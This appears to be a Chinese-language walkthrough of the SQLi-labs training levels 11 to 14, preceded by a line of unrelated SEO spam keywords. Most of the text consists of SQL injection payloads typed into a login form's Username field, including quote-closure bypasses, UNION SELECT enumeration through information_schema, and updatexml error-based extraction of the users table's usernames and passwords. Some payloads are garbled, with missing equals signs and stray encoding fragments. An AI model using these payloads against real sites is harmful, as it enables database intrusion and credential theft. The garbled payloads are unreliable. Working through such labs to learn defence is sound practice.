福州鼓楼区网站建设,小型便利店装修设计,小程序seo帝搜软件sem880官网,商业空间设计师岗位职责前言
第1-10关都是get方法#xff0c;本关开始进入post方法。其实post也好get也好#xff0c;本质都差不多#xff0c;使用的技巧也基本相同。 Less11
第11关打开是一个输入用户名密码的界面 显然登陆对话框会使用post方式提交#xff0c;这里我们尝试在Username一栏通过…前言
第1-10关都是get方法本关开始进入post方法。其实post也好get也好本质都差不多使用的技巧也基本相同。 Less11
第11关打开是一个输入用户名密码的界面 显然登陆对话框会使用post方式提交这里我们尝试在Username一栏通过单引号闭合看看什么效果 提示有个报错看来就是单引号闭合那可以肯定这里有个注入点在Username框尝试注意每个输入前面都有个单引号空格是闭合变量用的不是手误 or 11 -- asd 是不是发现和第一关的get方法效果类似既然有回显那就尝试通过联合注入的方式先看看有多少列在Username框输入 union select 1 -- asd 这里报错了表示union后的列数不对当我们尝试 union select 1,2 -- asd 不仅对了而且还把联合注入部分回显到页面和第一关类似。那接下来就是获取数据库命了在Username框输入 union select database(),2 -- asd 得到数据库名为security。接着就是获取表名 union select 1,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()) -- asd 显然users应该就是我们要找的表然后是查找列名 union select 1,(select group_concat(column_name) from information_schema.columns where table_nameusers) -- asd 列名中username和password应该就是我们要找的列然后查出用户名和密码 union select 1,(select group_concat(username) from users) -- asd union select 1,(select group_concat(password) from users) -- asd 通关 Less12
第十二关先输入单引号 显示错误再输入双引号 看报错信息应该是双引号和括号作为闭合测试一下在Username框输入
) or 11 -- asd 成功那就确定了通过双引号括号闭合。剩下的参考第11关即可不再复述。 Less13
第13关先测试单引号 看来是单引号括号的闭合再测试
) or 11 -- asd 确定了单引号括号的闭合但是这里没有登陆正确的回显。不过有错误的回显所以可以利用updatexml大法来处理和第五关的处理方式类似。在Username框输入
) or updatexml(1,concat(~,database(),~),1) -- asd 找出了数据库名为security。然后找出对应表名Username对话框输入
) or updatexml(1,concat(~,(select table_name from information_schema.tables where table_schemadatabase() limit 0,1),~),1) -- asd 第一个表是emails我们逐个尝试当输入
) or updatexml(1,concat(~,(select table_name from information_schema.tables where table_schemadatabase() limit 3,1),~),1) -- asd 找出了users表。接着是列名同样我们逐个尝试后在输入以下两条时找到了username和password列名
) or updatexml(1,concat(~,(select column_name from information_schema.columns where table_nameusers limit 4,1),~),1) -- asd
) or updatexml(1,concat(~,(select column_name from information_schema.columns where table_nameusers limit 5,1),~),1) -- asd 之后找出用户名Username框输入
) or updatexml(1,concat(~,(select username from security.users limit 0,1),~),1) -- asd 密码
) or updatexml(1,concat(~,(select password from security.users limit 0,1),~),1) -- asd 通关 Less14
第14关和13关类似区别仅在于通过双引号闭合其余都一样不另外叙述。
